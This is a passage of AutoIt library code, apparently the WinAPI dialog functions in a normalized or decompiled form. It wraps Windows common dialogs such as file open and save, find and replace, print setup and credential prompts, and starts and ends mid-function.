) CASE $CDERR_NOTEMPLATE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding template." ) CASE $CDERR_REGISTERMSGFAIL RETURN SETERROR ($ARESULT [0 ] , 0 , "The RegisterWindowMessage function returned an error code when it was called by the common dialog box function." ) CASE $CDERR_STRUCTSIZE RETURN SETERROR ($ARESULT [0 ] , 0 , "The lStructSize member of the initialization structure for the corresponding common dialog box is invalid" ) CASE $FNERR_BUFFERTOOSMALL RETURN SETERROR ($ARESULT [0 ] , 0 , "The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user." & @LF & "The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name." ) CASE $FNERR_INVALIDFILENAME RETURN SETERROR ($ARESULT [0 ] , 0 , "A file name is invalid." ) CASE $FNERR_SUBCLASSFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "An attempt to subclass a list box failed because sufficient memory was not available." 
) ENDSWITCH ENDIF RETURN SETERROR (@ERROR , @EXTENDED , "0x" & HEX ($ARESULT [0 ] ) ) ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROREX () LOCAL $ARET = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CONFIRMCREDENTIALS ($STARGET , $BCONFIRM ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIConfirmCredentialsW" , "wstr" , $STARGET , "bool" , $BCONFIRM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FINDTEXTDLG ($HOWNER , $SFINDWHAT = "" , $IFLAGS = 0 , $PFINDPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 2 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DLLSTRUCTSETDATA (DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , $__G_PFRBUFFER ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , 0 ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , 0 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PFINDPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "FindTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR + 30 __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , @EXTENDED , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC 
FUNC _WINAPI_FLUSHFRBUFFER () IF NOT __HEAPFREE ($__G_PFRBUFFER , 1 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FORMATDRIVEDLG ($SDRIVE , $IOPTION = 0 , $HPARENT = 0 ) IF NOT ISSTRING ($SDRIVE ) THEN RETURN SETERROR (10 , 0 , 0 ) $SDRIVE = STRINGLEFT (STRINGUPPER (STRINGSTRIPWS ($SDRIVE , $STR_STRIPLEADING ) ) , 1 ) IF NOT $SDRIVE THEN RETURN SETERROR (11 , 0 , 0 ) $SDRIVE = ASC ($SDRIVE ) + 4294967231 IF ($SDRIVE < 0 ) OR ($SDRIVE > 25 ) THEN RETURN SETERROR (12 , 0 , 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHFormatDrive" , "hwnd" , $HPARENT , "uint" , $SDRIVE , "uint" , 65535 , "uint" , $IOPTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] < 0 THEN RETURN SETERROR ($ARET [0 ] , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCONNECTEDDLG ($IDLG , $IFLAGS = 0 , $HPARENT = 0 ) IF NOT __DLL ("connect.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) SWITCH $IDLG CASE 0 $IDLG = "GetNetworkConnected" CASE 1 $IDLG = "GetInternetConnected" CASE 2 $IDLG = "GetVPNConnected" CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH LOCAL $SSTR = "" IF BITAND ($IFLAGS , 1 ) THEN $SSTR &= "-SkipInternetDetection " ENDIF IF BITAND ($IFLAGS , 2 ) THEN $SSTR &= "-SkipExistingConnections " ENDIF IF BITAND ($IFLAGS , 4 ) THEN $SSTR &= "-HideFinishPage " ENDIF LOCAL $ARET = DLLCALL ("connect.dll" , "long" , $IDLG , "hwnd" , $HPARENT , "dword" , 0 , "dword" , 0 , "dword" , 0 , "handle" , 0 , "wstr" , STRINGSTRIPWS ($SSTR , $STR_STRIPTRAILING ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT ($ARET [0 ] = 0 OR $ARET [0 ] = 1 ) THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN NUMBER (NOT $ARET [0 ] ) ENDFUNC FUNC _WINAPI_GETFRBUFFER () RETURN $__G_IFRBUFFERSIZE + 4294967295 ENDFUNC FUNC _WINAPI_GETOPENFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." 
, $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $VRESULT = __OFNDLG (0 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN RETURN __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($VRESULT ) ELSE RETURN __WINAPI_PARSEFILEDIALOGPATH ($VRESULT ) ENDIF ENDFUNC FUNC _WINAPI_GETSAVEFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." , $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $SRETURN = __OFNDLG (1 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN __WINAPI_PARSEFILEDIALOGPATH ($SRETURN ) ENDFUNC FUNC _WINAPI_MESSAGEBOXCHECK ($ITYPE , $STITLE , $STEXT , $SREGVAL , $IDEFAULT = + 4294967295 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "SHMessageBoxCheckW" , "hwnd" , $HPARENT , "wstr" , $STEXT , "wstr" , $STITLE , "uint" , $ITYPE , "int" , $IDEFAULT , "wstr" , $SREGVAL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MESSAGEBOXINDIRECT ($TMSGBOXPARAMS ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "MessageBoxIndirectW" , "struct*" , $TMSGBOXPARAMS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (0 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN 
RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_PAGESETUPDLG (BYREF $TPAGESETUPDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "int" , "PageSetupDlgW" , "struct*" , $TPAGESETUPDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PICKICONDLG ($SICON = "" , $IINDEX = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "PickIconDlg" , "hwnd" , $HPARENT , "wstr" , $SICON , "int" , 4096 , "int*" , $IINDEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARES = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = $ARES [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PRINTDLG (BYREF $TPRINTDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgW" , "struct*" , $TPRINTDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PRINTDLGEX (BYREF $TPRINTDLGEX ) LOCAL $TPDEX = DLLSTRUCTCREATE ($TAGPRINTDLGEX , DLLSTRUCTGETPTR ($TPRINTDLGEX ) ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgExW" , "struct*" , $TPDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TPDEX , "ResultAction" ) , 1 ) ENDFUNC FUNC _WINAPI_REPLACETEXTDLG ($HOWNER , $SFINDWHAT = "" , $SREPLACEWITH = "" , $IFLAGS = 0 , $PREPLACEPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 4 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 100 , @EXTENDED , 0 ) LOCAL $TBUFF = DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "];wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) 
DLLSTRUCTSETDATA ($TBUFF , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) DLLSTRUCTSETDATA ($TBUFF , 2 , STRINGLEFT ($SREPLACEWITH , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , DLLSTRUCTGETPTR ($TBUFF , 1 ) ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , DLLSTRUCTGETPTR ($TBUFF , 2 ) ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PREPLACEPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "ReplaceTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RESTARTDLG ($STEXT = "" , $IFLAGS = 2 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "RestartDialog" , "hwnd" , $HPARENT , "wstr" , $STEXT , "int" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SAVEFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (1 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_SETFRBUFFER ($ICHARS ) $ICHARS = NUMBER ($ICHARS ) IF 
$ICHARS < 80 THEN $ICHARS = 80 ENDIF $__G_IFRBUFFERSIZE = $ICHARS + 1 RETURN 1 ENDFUNC FUNC _WINAPI_SHELLABOUTDLG ($STITLE , $SNAME , $STEXT , $HICON = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "ShellAboutW" , "hwnd" , $HPARENT , "wstr" , $STITLE & "#" & $SNAME , "wstr" , $STEXT , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENWITHDLG ($SFILEPATH , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $TOPENASINFO = DLLSTRUCTCREATE ("ptr;ptr;dword;wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TOPENASINFO , 1 , DLLSTRUCTGETPTR ($TOPENASINFO , 4 ) ) DLLSTRUCTSETDATA ($TOPENASINFO , 2 , 0 ) DLLSTRUCTSETDATA ($TOPENASINFO , 3 , $IFLAGS ) DLLSTRUCTSETDATA ($TOPENASINFO , 4 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenWithDialog" , "hwnd" , $HPARENT , "struct*" , $TOPENASINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSTARTNETCONNECTIONDLG ($SREMOTE = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $STYPEOFREMOTE = "wstr" IF NOT STRINGSTRIPWS ($SREMOTE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFREMOTE = "ptr" $SREMOTE = 0 ENDIF DLLCALL ("shell32.dll" , "long" , "SHStartNetConnectionDialogW" , "hwnd" , $HPARENT , $STYPEOFREMOTE , $SREMOTE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLG ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $STARGET , $IFLAGS = 0 , $IERROR = 0 , $BSAVE = FALSE , $HBITMAP = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 
2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , $HBITMAP ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForCredentialsW" , "struct*" , $TINFO , "wstr" , $STARGET , "ptr" , 0 , "dword" , $IERROR , "wstr" , $SUSER , "ulong" , 4096 , "wstr" , $SPASSWORD , "ulong" , 4096 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [3 ] $ARESULT [0 ] = $ARET [5 ] $ARESULT [1 ] = $ARET [7 ] $ARESULT [2 ] = $ARET [9 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLGEX ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $IFLAGS = 0 , $IAUTHERROR = 0 , $BSAVE = FALSE , $IPACKAGE = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TBLOB = 0 , $ARET IF STRINGLEN ($SUSER ) THEN $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "ptr" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $TBLOB = DLLSTRUCTCREATE ("byte[" & $ARET [5 ] & "]" ) $ARET = DLLCALL ("credui.dll" , "bool" , "CredPackAuthenticationBufferW" , "dword" , 1 , "wstr" , $SUSER , "wstr" , $SPASSWORD , "struct*" , $TBLOB , "dword*" , $ARET [5 ] ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) ENDIF LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , 
DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , 0 ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForWindowsCredentialsW" , "struct*" , $TINFO , "dword" , $IAUTHERROR , "ulong*" , $IPACKAGE , "struct*" , $TBLOB , "ulong" , DLLSTRUCTGETSIZE ($TBLOB ) , "ptr*" , 0 , "ulong*" , 0 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR + 30 , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (30 , $ARET [0 ] , 0 ) LOCAL $ARESULT [4 ] , $IERROR = 0 $ARESULT [2 ] = $ARET [8 ] $ARESULT [3 ] = $ARET [3 ] LOCAL $PBLOB = $ARET [6 ] LOCAL $ISIZE = $ARET [7 ] $ARET = DLLCALL ("credui.dll" , "bool" , "CredUnPackAuthenticationBufferW" , "dword" , 1 , "ptr" , $PBLOB , "dword" , $ISIZE , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 , "wstr" , "" , "dword*" , 4096 ) IF NOT @ERROR AND $ARET [0 ] THEN $ARESULT [0 ] = $ARET [4 ] $ARESULT [1 ] = $ARET [8 ] ELSE $IERROR = @ERROR + 40 ENDIF IF NOT _WINAPI_ZEROMEMORY ($PBLOB , $ISIZE ) THEN ENDIF _WINAPI_COTASKMEMFREE ($PBLOB ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARESULT ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __OFNDLG ($IDLG , $STITLE , $SINITDIR , $SFILTERS , $IDEFFILTER , $SDEFFILE , $SDEFEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) LOCAL $TBUFFER = DLLSTRUCTCREATE ("wchar[32768]" ) LOCAL $TFILTERS = 0 , $TDEFEXT = 0 , $TINITDIR = 0 , $TTITLE = 0 LOCAL $TOFN = DLLSTRUCTCREATE ($TAGOPENFILENAME ) DLLSTRUCTSETDATA ($TOFN , "StructSize" , DLLSTRUCTGETSIZE ($TOFN ) ) DLLSTRUCTSETDATA ($TOFN , "hwndOwner" , $HPARENT ) DLLSTRUCTSETDATA ($TOFN , 3 , 0 ) LOCAL $ADATA = STRINGSPLIT ($SFILTERS , "|" ) LOCAL $AFILTERS [$ADATA [0 ] * 2 ] LOCAL $ICOUNT = 0 FOR $I = 1 TO $ADATA [0 ] $AFILTERS [$ICOUNT + 0 ] = STRINGSTRIPWS ($ADATA [$I ] , $STR_STRIPLEADING + $STR_STRIPTRAILING ) $AFILTERS [$ICOUNT + 1 ] = STRINGSTRIPWS 
(STRINGREGEXPREPLACE ($ADATA [$I ] , ".*\((.*)\)" , "\1" ) , $STR_STRIPALL ) IF $AFILTERS [$ICOUNT + 1 ] THEN $ICOUNT += 2 ENDIF NEXT IF $ICOUNT THEN $TFILTERS = _WINAPI_ARRAYTOSTRUCT ($AFILTERS , 0 , $ICOUNT + 4294967295 ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFilter" , DLLSTRUCTGETPTR ($TFILTERS ) ) DLLSTRUCTSETDATA ($TOFN , 5 , 0 ) DLLSTRUCTSETDATA ($TOFN , 6 , 0 ) DLLSTRUCTSETDATA ($TOFN , "nFilterIndex" , $IDEFFILTER ) $SDEFFILE = STRINGSTRIPWS ($SDEFFILE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFFILE THEN DLLSTRUCTSETDATA ($TBUFFER , 1 , $SDEFFILE ) ENDIF DLLSTRUCTSETDATA ($TOFN , "lpstrFile" , DLLSTRUCTGETPTR ($TBUFFER ) ) DLLSTRUCTSETDATA ($TOFN , "nMaxFile" , 32768 ) DLLSTRUCTSETDATA ($TOFN , 10 , 0 ) DLLSTRUCTSETDATA ($TOFN , 11 , 0 ) $SINITDIR = STRINGSTRIPWS ($SINITDIR , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SINITDIR THEN $TINITDIR = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SINITDIR ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TINITDIR , 1 , $SINITDIR ) DLLSTRUCTSETDATA ($TOFN , "lpstrInitialDir" , DLLSTRUCTGETPTR ($TINITDIR ) ) $STITLE = STRINGSTRIPWS ($STITLE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $STITLE THEN $TTITLE = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($STITLE ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TTITLE , 1 , $STITLE ) DLLSTRUCTSETDATA ($TOFN , "lpstrTitle" , DLLSTRUCTGETPTR ($TTITLE ) ) DLLSTRUCTSETDATA ($TOFN , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TOFN , 15 , 0 ) DLLSTRUCTSETDATA ($TOFN , 16 , 0 ) $SDEFEXT = STRINGSTRIPWS ($SDEFEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFEXT THEN $TDEFEXT = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($TDEFEXT ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TDEFEXT , 1 , STRINGREPLACE ($SDEFEXT , "." 
, "" ) ) DLLSTRUCTSETDATA ($TOFN , "lpstrDefExt" , DLLSTRUCTGETPTR ($TDEFEXT ) ) DLLSTRUCTSETDATA ($TOFN , "lCustData" , $PDATA ) DLLSTRUCTSETDATA ($TOFN , "lpfnHook" , $POFNPROC ) DLLSTRUCTSETDATA ($TOFN , 20 , 0 ) DLLSTRUCTSETDATA ($TOFN , 21 , 0 ) DLLSTRUCTSETDATA ($TOFN , 22 , 0 ) DLLSTRUCTSETDATA ($TOFN , "FlagsEx" , $IFLAGSEX ) LOCAL $ARET SWITCH $IDLG CASE 0 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetOpenFileNameW" , "struct*" , $TOFN ) CASE 1 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetSaveFileNameW" , "struct*" , $TOFN ) CASE ELSE ENDSWITCH IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN IF BITAND ($IFLAGS , $OFN_EXPLORER ) THEN $ADATA = _WINAPI_STRUCTTOARRAY ($TBUFFER ) IF @ERROR THEN RETURN SETERROR (11 , 0 , "" ) ENDIF ELSE $ADATA = STRINGSPLIT (DLLSTRUCTGETDATA ($TBUFFER , 1 ) , " " ) ENDIF SWITCH $ADATA [0 ] CASE 0 RETURN SETERROR (12 , 0 , "" ) CASE 1 CASE ELSE LOCAL $SPATH = $ADATA [1 ] FOR $I = 2 TO $ADATA [0 ] $ADATA [$I + 4294967295 ] = _WINAPI_PATHAPPEND ($SPATH , $ADATA [$I ] ) NEXT REDIM $ADATA [$ADATA [0 ] ] $ADATA [0 ] -= 1 ENDSWITCH ELSE $ADATA = DLLSTRUCTGETDATA ($TBUFFER , 1 ) ENDIF $__G_VEXT = $TOFN RETURN $ADATA ENDFUNC FUNC __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($APATH ) LOCAL $AFILES [UBOUND ($APATH ) + 1 ] $AFILES [0 ] = UBOUND ($APATH ) $AFILES [1 ] = STRINGMID ($APATH [1 ] , 1 , STRINGINSTR ($APATH [1 ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) FOR $I = 1 TO UBOUND ($APATH ) + 4294967295 $AFILES [$I + 1 ] = STRINGMID ($APATH [$I ] , STRINGINSTR ($APATH [$I ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 1 ) NEXT RETURN $AFILES ENDFUNC FUNC __WINAPI_PARSEFILEDIALOGPATH ($SPATH ) LOCAL $AFILES [3 ] $AFILES [0 ] = 2 $AFILES [1 ] = STRINGMID ($SPATH , 1 , STRINGINSTR ($SPATH , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) $AFILES [2 ] = STRINGMID 
